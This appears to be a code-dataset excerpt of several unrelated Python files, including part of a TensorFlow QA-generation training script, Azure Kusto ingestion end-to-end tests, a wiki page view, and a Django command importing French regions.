iter_apply(vaX, vaM)\n tr_cost = tr_cost/len(trX[:n_valid])\n va_cost = va_cost/n_valid\n tr_acc = float(target_based_np_rouge(np.reshape(tr_preds, vaX[:, 1:, 0].shape), trX[:n_valid, 1:, 0], delimiter, end)[\"rouge_1/f_score\"])\n va_acc = float(target_based_np_rouge(np.reshape(va_preds, vaX[:, 1:, 0].shape), vaX[:, 1:, 0], delimiter, end)[\"rouge_1/f_score\"])\n logger.log(n_epochs=n_epochs, n_updates=n_updates, tr_cost=tr_cost, va_cost=va_cost, tr_acc=tr_acc, va_acc=va_acc)\n print('%d %d %.3f %.3f %.2f %.2f'%(n_epochs, n_updates, tr_cost, va_cost, tr_acc, va_acc))\n if submit:\n score = va_acc\n if score > best_score:\n best_score = score\n save(os.path.join(save_dir, desc, 'best_params.jl'))\n\ndef predict():\n predictions = iter_predict(teX, teM)\n predictions = np.reshape(predictions, [len(teX), -1])\n if decoder is not None:\n predictions = [\" \".join([decoder.get(token, \"\") for token in np.trim_zeros(prediction,'b')]\n ).replace(\"\",\"\").replace(\"\\n\",\"\").strip() for prediction in predictions]\n targets = [\" \".join([decoder.get(token, \"\") for token in np.trim_zeros(target,'b')]\n ).replace(\"\",\"\").replace(\"\\n\",\"\").strip() for target in teX[:, 1:, 0]]\n path = os.path.join(submission_dir, desc)\n os.makedirs(os.path.dirname(path), exist_ok=True)\n with open(path, 'w') as f:\n for i, (prediction, target) in enumerate(zip(predictions, targets)):\n f.write('INDEX: {}\\nPREDICTION: {}\\nTARGET: {}\\n'.format(i, prediction, target))\n f.write('#'*150+'\\n')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--desc', type=str, default='transformer_qa_gen') # dir args\n parser.add_argument('--log_dir', type=str, default='log/')\n parser.add_argument('--save_dir', type=str, default='save/')\n parser.add_argument('--submission_dir', type=str, default='submission/')\n parser.add_argument('--encoding_dir', type=str, default='data/bpe_encoding/')\n parser.add_argument('--data_dir', type=str, default='data/squad_1.1/')\n parser.add_argument('--pretrained_lm_dir', type=str, default='data/pretrained_language_model_params/')\n parser.add_argument('--use_prev_best', action='store_true')\n parser.add_argument('--submit', action='store_true')\n parser.add_argument('--data_limit', type=int)\n parser.add_argument('--seed', type=int, default=42) # seed\n parser.add_argument('--n_gpu', type=int, default=1) # train args\n parser.add_argument('--n_iter', type=int, default=3)\n parser.add_argument('--n_batch', type=int, default=4)\n parser.add_argument('--n_ctx', type=int, default=512) # model params\n parser.add_argument('--n_embd', type=int, default=768)\n parser.add_argument('--n_head', type=int, default=12)\n parser.add_argument('--n_layer', type=int, default=12)\n parser.add_argument('--embd_pdrop', type=float, default=0.1)\n parser.add_argument('--attn_pdrop', type=float, default=0.1)\n parser.add_argument('--resid_pdrop', type=float, default=0.1)\n parser.add_argument('--max_grad_norm', type=int, default=1) # opt args\n parser.add_argument('--lr', type=float, default=6.25e-5)\n parser.add_argument('--lr_warmup', type=float, default=0.002)\n parser.add_argument('--l2', type=float, default=0.01)\n parser.add_argument('--vector_l2', action='store_true')\n parser.add_argument('--lr_schedule', type=str, default='warmup_linear')\n parser.add_argument('--b1', type=float, default=0.9)\n parser.add_argument('--b2', type=float, default=0.999)\n parser.add_argument('--e', type=float, default=1e-8)\n args = parser.parse_args()\n print(args)\n globals().update(args.__dict__)\n # set seed\n random.seed(seed)\n np.random.seed(seed)\n tf.set_random_seed(seed)\n # log args\n logger = ResultLogger(path=os.path.join(log_dir, '{}.jsonl'.format(desc)), **args.__dict__)\n # handle data \n (trX, trM), (vaX, vaM), (teX, teM), config = gen_squad_data(n_ctx, encoding_dir, data_dir, data_limit=data_limit)\n globals().update(config)\n n_train = len(trX)\n n_valid = len(vaX)\n n_batch_train = n_batch*n_gpu\n n_updates_total = (n_train//n_batch_train)*n_iter\n # place holders\n X_train = tf.placeholder(tf.int32, [n_batch_train, n_ctx, 2])\n M_train = tf.placeholder(tf.float32, [n_batch_train, n_ctx])\n X = tf.placeholder(tf.int32, [None, n_ctx, 2])\n M = tf.placeholder(tf.float32, [None, n_ctx])\n # mgpu train and predict\n train, logits, lm_losses = mgpu_train(X_train, M_train)\n lm_loss = tf.reduce_mean(lm_losses)\n eval_mgpu_logits, eval_mgpu_lm_losses = mgpu_predict(X_train, M_train)\n eval_logits, eval_lm_losses = model(X, M, \n n_vocab=n_vocab, n_special=n_special, n_ctx=n_ctx, n_embd=n_embd, \n embd_pdrop=embd_pdrop, n_layer=n_layer, n_head=n_head, attn_pdrop=attn_pdrop, \n resid_pdrop=resid_pdrop, train=False, reuse=True)\n eval_lm_loss = tf.reduce_mean(eval_lm_losses)\n eval_mgpu_lm_loss = tf.reduce_mean(eval_mgpu_lm_losses)\n # params\n params = find_trainable_variables('model')\n sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))\n sess.run(tf.global_variables_initializer())\n # get saved params\n if use_prev_best and os.path.isfile(os.path.join(save_dir, desc, 'best_params.jl')):\n sess.run([p.assign(ip) for p, ip in zip(params, joblib.load(os.path.join(save_dir, desc, 'best_params.jl')))])\n else:\n shapes = json.load(open('{}params_shapes.json'.format(pretrained_lm_dir)))\n offsets = np.cumsum([np.prod(shape) for shape in shapes])\n init_params = [np.load('{}params_{}.npy'.format(pretrained_lm_dir, n)) for n in range(10)]\n init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]\n init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]\n init_params[0] = init_params[0][:n_ctx]\n if n_ctx > 512:\n init_params[0] = np.concatenate([init_params[0], [init_params[0][-1] for i in range(n_ctx-512)]])\n init_params[0] = np.concatenate([init_params[1], (np.random.randn(n_special, n_embd)*0.02).astype(np.float32), init_params[0]], 0)\n del init_params[1]\n sess.run([p.assign(ip) for p, ip in zip(params[:145], init_params[:145])])\n # train, eval, test\n n_updates = 0\n n_epochs = 0\n if submit:\n save(os.path.join(save_dir, desc, 'best_params.jl'))\n best_score = 0\n for i in range(n_iter):\n for xmb, mmb in iter_data(*shuffle(trX, trM, random_state=np.random), n_batch=n_batch_train, truncate=True, verbose=True):\n cost, _ = sess.run([lm_loss, train], {X_train:xmb, M_train:mmb})\n n_updates += 1\n if n_updates in [1000, 2000, 4000, 8000, 16000, 32000] and n_epochs == 0:\n log()\n n_epochs += 1\n log()\n if submit:\n sess.run([p.assign(ip) for p, ip in zip(params, joblib.load(os.path.join(save_dir, desc, 'best_params.jl')))])\n predict()","sub_path":"train_transformer_qa_gen.py","file_name":"train_transformer_qa_gen.py","file_ext":"py","file_size_in_byte":12787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"380127722","text":"\"\"\"E2E tests for ingest_client.\"\"\"\nimport pytest\nimport time\nimport os\nimport uuid\nimport io\n\nfrom azure.kusto.data.request import KustoClient, KustoConnectionStringBuilder\nfrom azure.kusto.ingest.status import KustoIngestStatusQueues\nfrom azure.kusto.ingest import (\n KustoIngestClient,\n KustoStreamingIngestClient,\n IngestionProperties,\n JsonColumnMapping,\n CsvColumnMapping,\n DataFormat,\n ValidationPolicy,\n ValidationOptions,\n ValidationImplications,\n ReportLevel,\n ReportMethod,\n FileDescriptor,\n KustoMissingMappingReferenceError,\n)\n\n# TODO: change this file to use pytest as runner\n\n\nclass Helpers:\n \"\"\"A class to define mappings to deft table.\"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def create_deft_table_csv_mappings():\n \"\"\"A method to define csv mappings to deft table.\"\"\"\n mappings = list()\n mappings.append(CsvColumnMapping(columnName=\"rownumber\", cslDataType=\"int\", ordinal=0))\n mappings.append(CsvColumnMapping(columnName=\"rowguid\", cslDataType=\"string\", ordinal=1))\n mappings.append(CsvColumnMapping(columnName=\"xdouble\", cslDataType=\"real\", ordinal=2))\n mappings.append(CsvColumnMapping(columnName=\"xfloat\", cslDataType=\"real\", ordinal=3))\n mappings.append(CsvColumnMapping(columnName=\"xbool\", cslDataType=\"bool\", ordinal=4))\n mappings.append(CsvColumnMapping(columnName=\"xint16\", cslDataType=\"int\", ordinal=5))\n mappings.append(CsvColumnMapping(columnName=\"xint32\", cslDataType=\"int\", ordinal=6))\n mappings.append(CsvColumnMapping(columnName=\"xint64\", cslDataType=\"long\", ordinal=7))\n mappings.append(CsvColumnMapping(columnName=\"xuint8\", cslDataType=\"long\", ordinal=8))\n mappings.append(CsvColumnMapping(columnName=\"xuint16\", cslDataType=\"long\", ordinal=9))\n mappings.append(CsvColumnMapping(columnName=\"xuint32\", cslDataType=\"long\", ordinal=10))\n mappings.append(CsvColumnMapping(columnName=\"xuint64\", cslDataType=\"long\", ordinal=11))\n mappings.append(CsvColumnMapping(columnName=\"xdate\", cslDataType=\"datetime\", ordinal=12))\n mappings.append(CsvColumnMapping(columnName=\"xsmalltext\", cslDataType=\"string\", ordinal=13))\n mappings.append(CsvColumnMapping(columnName=\"xtext\", cslDataType=\"string\", ordinal=14))\n mappings.append(CsvColumnMapping(columnName=\"xnumberAsText\", cslDataType=\"string\", ordinal=15))\n mappings.append(CsvColumnMapping(columnName=\"xtime\", cslDataType=\"timespan\", ordinal=16))\n mappings.append(CsvColumnMapping(columnName=\"xtextWithNulls\", cslDataType=\"string\", ordinal=17))\n mappings.append(CsvColumnMapping(columnName=\"xdynamicWithNulls\", cslDataType=\"dynamic\", ordinal=18))\n return mappings\n\n @staticmethod\n def create_deft_table_json_mappings():\n \"\"\"A method to define json mappings to deft table.\"\"\"\n mappings = list()\n mappings.append(JsonColumnMapping(columnName=\"rownumber\", jsonPath=\"$.rownumber\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"rowguid\", jsonPath=\"$.rowguid\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xdouble\", jsonPath=\"$.xdouble\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xfloat\", jsonPath=\"$.xfloat\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xbool\", jsonPath=\"$.xbool\", cslDataType=\"bool\"))\n mappings.append(JsonColumnMapping(columnName=\"xint16\", jsonPath=\"$.xint16\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint32\", jsonPath=\"$.xint32\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint64\", jsonPath=\"$.xint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint8\", jsonPath=\"$.xuint8\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint16\", jsonPath=\"$.xuint16\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint32\", jsonPath=\"$.xuint32\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint64\", jsonPath=\"$.xuint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xdate\", jsonPath=\"$.xdate\", cslDataType=\"datetime\"))\n mappings.append(JsonColumnMapping(columnName=\"xsmalltext\", jsonPath=\"$.xsmalltext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtext\", jsonPath=\"$.xtext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xnumberAsText\", jsonPath=\"$.xnumberAsText\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtime\", jsonPath=\"$.xtime\", cslDataType=\"timespan\"))\n mappings.append(JsonColumnMapping(columnName=\"xtextWithNulls\", jsonPath=\"$.xtextWithNulls\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xdynamicWithNulls\", jsonPath=\"$.xdynamicWithNulls\", cslDataType=\"dynamic\"))\n return mappings\n\n\ncluster = \"Dadubovs1.westus\" # \"toshetah\"\ndb_name = \"TestingDatabase\" # \"PythonTest\"\ntable_name = \"Deft\"\n\n\nengine_kcsb = KustoConnectionStringBuilder.with_aad_device_authentication(\"https://{}.kusto.windows.net\".format(cluster))\ndm_kcsb = KustoConnectionStringBuilder.with_aad_device_authentication(\"https://ingest-{}.kusto.windows.net\".format(cluster))\nclient = KustoClient(engine_kcsb)\ningest_client = KustoIngestClient(dm_kcsb)\ningest_status_q = KustoIngestStatusQueues(ingest_client)\n\nstreaming_ingest_client = KustoStreamingIngestClient(engine_kcsb)\n\nclient.execute(db_name, \".drop table {} ifexists\".format(table_name))\n\n\n@pytest.mark.run(order=1)\ndef test_csv_ingest_non_existing_table():\n csv_ingest_props = IngestionProperties(\n db_name, table_name, dataFormat=DataFormat.CSV, mapping=Helpers.create_deft_table_csv_mappings(), reportLevel=ReportLevel.FailuresAndSuccesses\n )\n csv_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv\")\n zipped_csv_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv.gz\")\n\n for f in [csv_file_path, zipped_csv_file_path]:\n ingest_client.ingest_from_file(f, csv_ingest_props)\n\n successes = 0\n timeout = 60\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 20, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\njson_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.json\")\nzipped_json_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.jsonz.gz\")\n\n\n@pytest.mark.run(order=2)\ndef test_json_ingest_existing_table():\n json_ingestion_props = IngestionProperties(\n db_name, table_name, dataFormat=DataFormat.JSON, mapping=Helpers.create_deft_table_json_mappings(), reportLevel=ReportLevel.FailuresAndSuccesses\n )\n\n for f in [json_file_path, zipped_json_file_path]:\n ingest_client.ingest_from_file(f, json_ingestion_props)\n\n successes = 0\n timeout = 60\n\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 24, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=3)\ndef test_ingest_complicated_props():\n # Test ingest with complicated ingestion properties\n validation_policy = ValidationPolicy(\n validationOptions=ValidationOptions.ValidateCsvInputConstantColumns, validationImplications=ValidationImplications.Fail\n )\n json_ingestion_props = IngestionProperties(\n db_name,\n table_name,\n dataFormat=DataFormat.JSON,\n mapping=Helpers.create_deft_table_json_mappings(),\n additionalTags=[\"a\", \"b\"],\n ingestIfNotExists=[\"aaaa\", \"bbbb\"],\n ingestByTags=[\"ingestByTag\"],\n dropByTags=[\"drop\", \"drop-by\"],\n flushImmediately=False,\n reportLevel=ReportLevel.FailuresAndSuccesses,\n reportMethod=ReportMethod.Queue,\n validationPolicy=validation_policy,\n )\n\n file_paths = [json_file_path, zipped_json_file_path]\n fds = [FileDescriptor(fp, 0, uuid.uuid4()) for fp in file_paths]\n source_ids = [\"{}\".format(fd.source_id) for fd in fds]\n\n for fd in fds:\n ingest_client.ingest_from_file(fd, json_ingestion_props)\n\n successes = 0\n timeout = 60\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n if success_message[0].IngestionSourceId in source_ids:\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 28, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=4)\ndef test_json_ingestion_ingest_by_tag():\n json_ingestion_props = IngestionProperties(\n db_name,\n table_name,\n dataFormat=DataFormat.JSON,\n mapping=Helpers.create_deft_table_json_mappings(),\n ingestIfNotExists=[\"ingestByTag\"],\n reportLevel=ReportLevel.FailuresAndSuccesses,\n dropByTags=[\"drop\", \"drop-by\"],\n )\n ops = []\n for f in [json_file_path, zipped_json_file_path]:\n ingest_client.ingest_from_file(f, json_ingestion_props)\n\n successes = 0\n timeout = 60\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 28, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=5)\ndef test_tsv_ingestion_csv_mapping():\n tsv_ingestion_props = IngestionProperties(\n db_name, table_name, dataFormat=DataFormat.TSV, mapping=Helpers.create_deft_table_csv_mappings(), reportLevel=ReportLevel.FailuresAndSuccesses\n )\n tsv_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.tsv\")\n\n ingest_client.ingest_from_file(tsv_file_path, tsv_ingestion_props)\n\n successes = 0\n timeout = 60\n while successes != 1 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Table == table_name\n assert success_message[0].Database == db_name\n\n successes += 1\n\n assert successes == 1\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 38, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=6)\ndef test_streaming_ingest_from_opened_file():\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n stream = open(file_path, \"r\")\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n ingest_client.ingest_from_stream(stream, ingestion_properties=ingestion_properties)\n\n\n@pytest.mark.run(order=7)\ndef test_streaming_ingest_form_csv_file():\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv.gz\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n\n@pytest.mark.run(order=8)\ndef test_streaming_ingest_from_json_no_mapping():\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.JSON)\n try:\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.json\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n except KustoMissingMappingReferenceError:\n pass\n\n try:\n byte_sequence = b'{\"rownumber\": 0, \"rowguid\": \"00000000-0000-0000-0001-020304050607\", \"xdouble\": 0.0, \"xfloat\": 0.0, \"xbool\": 0, \"xint16\": 0, \"xint32\": 0, \"xint64\": 0, \"xunit8\": 0, \"xuint16\": 0, \"xunit32\": 0, \"xunit64\": 0, \"xdate\": \"2014-01-01T01:01:01Z\", \"xsmalltext\": \"Zero\", \"xtext\": \"Zero\", \"xnumberAsText\": \"0\", \"xtime\": \"00:00:00\", \"xtextWithNulls\": null, \"xdynamicWithNulls\": \"\"}'\n bytes_stream = io.BytesIO(byte_sequence)\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n except KustoMissingMappingReferenceError:\n pass\n\n\n@pytest.mark.run(order=9)\ndef test_streaming_ingest_from_json_file():\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.json\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.JSON, mappingReference=\"JsonMapping\")\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.jsonz.gz\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n\n@pytest.mark.run(order=10)\ndef test_streaming_ingest_from_io_streams():\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n byte_sequence = b'0,00000000-0000-0000-0001-020304050607,0,0,0,0,0,0,0,0,0,0,2014-01-01T01:01:01.0000000Z,Zero,\"Zero\",0,00:00:00,,null'\n bytes_stream = io.BytesIO(byte_sequence)\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n\n str_sequence = '0,00000000-0000-0000-0001-020304050607,0,0,0,0,0,0,0,0,0,0,2014-01-01T01:01:01.0000000Z,Zero,\"Zero\",0,00:00:00,,null'\n str_stream = io.StringIO(str_sequence)\n ingest_client.ingest_from_stream(str_stream, ingestion_properties=ingestion_properties)\n\n byte_sequence = b'{\"rownumber\": 0, \"rowguid\": \"00000000-0000-0000-0001-020304050607\", \"xdouble\": 0.0, \"xfloat\": 0.0, \"xbool\": 0, \"xint16\": 0, \"xint32\": 0, \"xint64\": 0, \"xunit8\": 0, \"xuint16\": 0, \"xunit32\": 0, \"xunit64\": 0, \"xdate\": \"2014-01-01T01:01:01Z\", \"xsmalltext\": \"Zero\", \"xtext\": \"Zero\", \"xnumberAsText\": \"0\", \"xtime\": \"00:00:00\", \"xtextWithNulls\": null, \"xdynamicWithNulls\": \"\"}'\n bytes_stream = io.BytesIO(byte_sequence)\n ingestion_properties.format = DataFormat.JSON\n\n ingestion_properties.ingestion_mapping_reference = \"JsonMapping\"\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n\n str_sequence = u'{\"rownumber\": 0, \"rowguid\": \"00000000-0000-0000-0001-020304050607\", \"xdouble\": 0.0, \"xfloat\": 0.0, \"xbool\": 0, \"xint16\": 0, \"xint32\": 0, \"xint64\": 0, \"xunit8\": 0, \"xuint16\": 0, \"xunit32\": 0, \"xunit64\": 0, \"xdate\": \"2014-01-01T01:01:01Z\", \"xsmalltext\": \"Zero\", \"xtext\": \"Zero\", \"xnumberAsText\": \"0\", \"xtime\": \"00:00:00\", \"xtextWithNulls\": null, \"xdynamicWithNulls\": \"\"}'\n str_stream = io.StringIO(str_sequence)\n ingest_client.ingest_from_stream(str_stream, ingestion_properties=ingestion_properties)\n\n byte_sequence = b'0,00000000-0000-0000-0001-020304050607,0,0,0,0,0,0,0,0,0,0,2014-01-01T01:01:01.0000000Z,Zero,\"Zero\",0,00:00:00,,null' * 600000\n bytes_stream = io.BytesIO(byte_sequence)\n\n try:\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n except KustoStreamMaxSizeExceededError:\n pass\n\n\n@pytest.mark.run(order=11)\ndef test_streaming_ingest_from_dataframe():\n from pandas import DataFrame\n\n fields = [\n \"rownumber\",\n \"rowguid\",\n \"xdouble\",\n \"xfloat\",\n \"xbool\",\n \"xint16\",\n \"xint32\",\n \"xint64\",\n \"xunit8\",\n \"xuint16\",\n \"xunit32\",\n \"xunit64\",\n \"xdate\",\n \"xsmalltext\",\n \"xtext\",\n \"xnumberAsText\",\n \"xtime\",\n \"xtextWithNulls\",\n \"xdynamicWithNulls\",\n ]\n rows = [[0, \"00000000-0000-0000-0001-020304050607\", 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, \"2014-01-01T01:01:01Z\", \"Zero\", \"Zero\", \"0\", \"00:00:00\", None, \"\"]]\n df = DataFrame(data=rows, columns=fields)\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n ingest_client.ingest_from_dataframe(df, ingestion_properties)\n","sub_path":"azure-kusto-ingest/tests/e2e.py","file_name":"e2e.py","file_ext":"py","file_size_in_byte":19788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"310688277","text":"from pysite.base_route import RouteView\nfrom pysite.mixins import DBMixin\n\n\nclass PageView(RouteView, DBMixin):\n path = \"/special/all_pages\"\n name = \"special.all_pages\"\n table_name = \"wiki\"\n\n def get(self):\n pages = self.db.pluck(self.table_name, \"title\", \"slug\")\n pages = sorted(pages, key=lambda d: d.get(\"title\", \"No Title\"))\n\n letters = {}\n\n for page in pages:\n if \"title\" not in page:\n page[\"title\"] = \"No Title\"\n\n letter = page[\"title\"][0].upper()\n\n if letter not in letters:\n letters[letter] = []\n\n letters[letter].append(page)\n\n return self.render(\"wiki/special_all.html\", letters=letters)\n","sub_path":"pysite/views/wiki/special/all_pages.py","file_name":"all_pages.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"407521085","text":"import json\n\nfrom django.db import transaction\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\n\nfrom geofr.models import Perimeter\nfrom geofr.constants import OVERSEAS_REGIONS\n\n\nDATA_PATH = '/node_modules/@etalab/decoupage-administratif/data/regions.json'\n\n\nclass Command(BaseCommand):\n \"\"\"Import the list of all regions.\"\"\"\n\n @transaction.atomic()\n def handle(self, *args, **options):\n\n france = Perimeter.objects.get(\n scale=Perimeter.TYPES.country,\n code='FRA')\n europe = Perimeter.objects.get(\n scale=Perimeter.TYPES.continent,\n code='EU')\n\n PerimeterContainedIn = Perimeter.contained_in.through\n perimeter_links = []\n\n data_file = settings.DJANGO_ROOT + DATA_PATH\n data = json.loads(data_file.read_file())\n nb_created = 0\n nb_updated = 0\n\n for entry in data:\n\n # Create or update the region perimeters\n region, created = Perimeter.objects.update_or_create(\n scale=Perimeter.TYPES.region,\n code=entry['code'],\n defaults={\n 'name': entry['nom'],\n 'is_overseas': (entry['code'] in OVERSEAS_REGIONS),\n }\n )\n if created:\n nb_created += 1\n else:\n nb_updated += 1\n\n perimeter_links.append(PerimeterContainedIn(\n from_perimeter_id=region.id,\n to_perimeter_id=europe.id))\n perimeter_links.append(PerimeterContainedIn(\n from_perimeter_id=region.id,\n to_perimeter_id=france.id))\n\n # Create the links between the regions and France / Europe\n PerimeterContainedIn.objects.bulk_create(\n perimeter_links, ignore_conflicts=True)\n\n self.stdout.write(self.style.SUCCESS(\n '%d regions created, %d updated.' % (nb_created, nb_updated)))\n","sub_path":"src/geofr/management/commands/populate_regions.py","file_name":"populate_regions.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"57913658","text":"# @author Piotr Nikiel \n\nimport sys\nimport os\nsys.path.insert(0, 'FrameworkInternals')\n\nfrom transformDesign import transformDesign\n\ndef runGenerator(className,uaoDirectory='UaoForQuasar', namespace='UaoClient'):\n output_header = os.path.join(uaoDirectory,'generated','{0}.h'.format(className))\n output_body = os.path.join(uaoDirectory,'generated','{0}.cpp'.format(className))\n additionalParam=['className={0}'.format(className), 'namespace={0}'.format(namespace)]\n transformDesign(\n xsltTransformation=os.path.join(uaoDirectory, 'xslt', 'designToClassHeader.xslt'), \n outputFile=output_header, \n requiresMerge=False, \n astyleRun=True, \n additionalParam=additionalParam)\n\n transformDesign(\n xsltTransformation=os.path.join(uaoDirectory, 'xslt', 'designToClassBody.xslt'), \n outputFile=output_body, \n requiresMerge=False, \n astyleRun=True, \n additionalParam=additionalParam)\n \ndef main():\n className = sys.argv[1]\n runGenerator(className)\n \nif __name__==\"__main__\":\n main()\n \n \n\n","sub_path":"generateClass.py","file_name":"generateClass.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"296007758","text":"# coding=utf-8\n__author__ = 'lifuxin'\n\nimport sys\nimport numpy as np\nimport pandas as 